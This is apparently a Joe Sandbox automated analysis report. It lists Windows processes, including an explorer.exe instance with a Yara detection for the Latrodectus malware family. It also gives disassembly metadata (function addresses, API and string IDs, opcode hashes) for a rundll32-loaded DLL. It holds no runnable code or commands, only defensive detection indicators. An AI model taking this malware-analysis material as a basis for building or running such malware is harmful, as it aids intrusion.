                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                          Start time:14:45:20
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                          Imagebase:0x7ff633410000
                                                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 00000001800123AC Relevance: 85.0, APIs: 33, Strings: 15, Instructions: 1002COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                                                                                                                                                            • API String ID: 2943138195-2884338863
                                                                                                                                                                                                                            • Opcode ID: a4df0876ac4a94a39638c7196227a47b03e7c172b3727400769d42072db2fcd3
                                                                                                                                                                                                                            • Instruction ID: b4a62fa320740793e51028c586208ea44f21078a71357bd31f68bd1aee6a94b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4df0876ac4a94a39638c7196227a47b03e7c172b3727400769d42072db2fcd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDA2B632614F8886EB92CB54E4813DEB7A1F7883C4F509115FA8987B99EF7CC659CB40
                                                                                                                                                                                                                            Function 0000000180055C62 Relevance: 17.8, Strings: 14, Instructions: 326COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
                                                                                                                                                                                                                            • API String ID: 0-1846638993
                                                                                                                                                                                                                            • Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                            • Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700
                                                                                                                                                                                                                            Function 000000018004A838 Relevance: 16.9, APIs: 8, Strings: 1, Instructions: 1137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                            • String ID: s
                                                                                                                                                                                                                            • API String ID: 1759834784-453955339
                                                                                                                                                                                                                            • Opcode ID: 60017fd9ff94673ad25669e86eb06ecf37892f2687e360f01889673209030f5b
                                                                                                                                                                                                                            • Instruction ID: c525837b9825935173f9aeacc8cdcd5494a916c687a9243ab5d6eacd3f949041
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60017fd9ff94673ad25669e86eb06ecf37892f2687e360f01889673209030f5b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABA2E3B26085C88BE7B68E29D5807D97795F38C7CCF519115EB06A7B94DB38DB08CB08
                                                                                                                                                                                                                            Function 000000018004C510 Relevance: 15.4, APIs: 10, Instructions: 371COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                            • Instruction ID: abfc01c1cae31b126f3606ba6e35873ac6e2165b9242cca6e17ef92ae9629bfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE1A076204A898BE7B6CF15D488BD937A0F39D7CCF529016EB0947B84DB35CA09CB45
                                                                                                                                                                                                                            Function 000000018004C060 Relevance: 10.7, APIs: 7, Instructions: 249COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                            • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                            Function 0000000180052534 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 1791977518-905460609
                                                                                                                                                                                                                            • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                            • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                            Function 0000000180053038 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                                                                                                            • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                            • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                            Function 00000001800402A0 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                            • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00
                                                                                                                                                                                                                            Function 0000000180048A24 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                            • Opcode ID: 8050a5f2c811f2b5614e223d50075f415f3b72ff85b2e3415f669b206f73c444
                                                                                                                                                                                                                            • Instruction ID: 40438c599c8c9a10dfd05480067568612864b3e7119a6cb65e47c7e0f6f871a0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8050a5f2c811f2b5614e223d50075f415f3b72ff85b2e3415f669b206f73c444
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB01A230704F8486EB819B56B8403DAA7A5FB8CBC4F688426FF4913B65CE38C6498344
                                                                                                                                                                                                                            Function 000000018002B9B4 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $*
                                                                                                                                                                                                                            • API String ID: 0-3982473090
                                                                                                                                                                                                                            • Opcode ID: c0b5ef1f71dfeaf3cdab848759054d837fc00b56838ff4bee2827b39696b9e62
                                                                                                                                                                                                                            • Instruction ID: 91aea432e051337e08d83ffae50650ad18d51bcf97f985ba9a988a1293af86a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0b5ef1f71dfeaf3cdab848759054d837fc00b56838ff4bee2827b39696b9e62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43C17F7210468C86EBE78F3990943ED3BA4E34DF88F298116EB8987399DF35C649C715
                                                                                                                                                                                                                            Function 000000018002C4F8 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $*
                                                                                                                                                                                                                            • API String ID: 0-3982473090
                                                                                                                                                                                                                            • Opcode ID: 028a58d21a02706f6b95621d60cc2bcc44f99014784313e76636ffc7fc61ced9
                                                                                                                                                                                                                            • Instruction ID: 0a9790d12befaeab5df69aa6cc85d8e026840852332dd1e3fe0d29c9a4b8a0ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028a58d21a02706f6b95621d60cc2bcc44f99014784313e76636ffc7fc61ced9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BC19E7250879886EBE78F2980547ED3BA4E34DF88F29C116EB4947395CF35C649CB06
                                                                                                                                                                                                                            Function 000000018004249C Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                            • Opcode ID: e51f301cbb3a2669150a557319c97461f2ea23aacdf8bbfe7d2018b16a75e56b
                                                                                                                                                                                                                            • Instruction ID: 0f0bd9227203c538734e35411e57eb926abe21b7a678f8c757267fb2b81f6dd3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e51f301cbb3a2669150a557319c97461f2ea23aacdf8bbfe7d2018b16a75e56b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC518B32714BC846E7A68E3598907997B91F348BD8F8AC221EB9487AC5CF79C548C704
                                                                                                                                                                                                                            Function 0000000180052904 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
